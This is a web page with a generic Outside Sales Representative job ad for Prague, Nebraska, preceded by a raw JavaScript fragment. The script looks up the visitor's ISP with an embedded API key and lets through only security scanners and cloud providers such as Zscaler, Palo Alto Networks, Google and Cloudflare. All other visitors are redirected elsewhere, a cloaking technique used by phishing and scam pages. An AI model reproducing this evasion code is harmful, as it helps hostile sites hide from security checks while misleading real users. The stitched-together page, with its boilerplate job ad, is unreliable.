Outside Sales Representative
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a motivated Outside Sales Representative to join our team in Prague, Nebraska. In this role, you will be responsible for generating new business opportunities, building strong client relationships, and promoting our products and services within the local community.
Key Responsibilities:
- Identify and pursue potential clients through cold calling, networking, and referrals
- Conduct in-person sales presentations and product demonstrations
- Develop and maintain long-term relationships with customers
- Achieve sales targets and contribute to company growth
- Provide excellent customer service and follow-up to ensure satisfaction
- Maintain accurate records of sales activities and client interactions
Skills Needed:
- Strong communication and interpersonal skills
- Self-motivated with a proactive approach
- Ability to work independently and manage time effectively
- Problem-solving skills and adaptability
- Basic knowledge of sales techniques and customer relationship management
Benefits include competitive commission structure, health and wellness plans, flexible scheduling, and opportunities for professional growth. Join us to make a positive impact in the community and advance your sales career!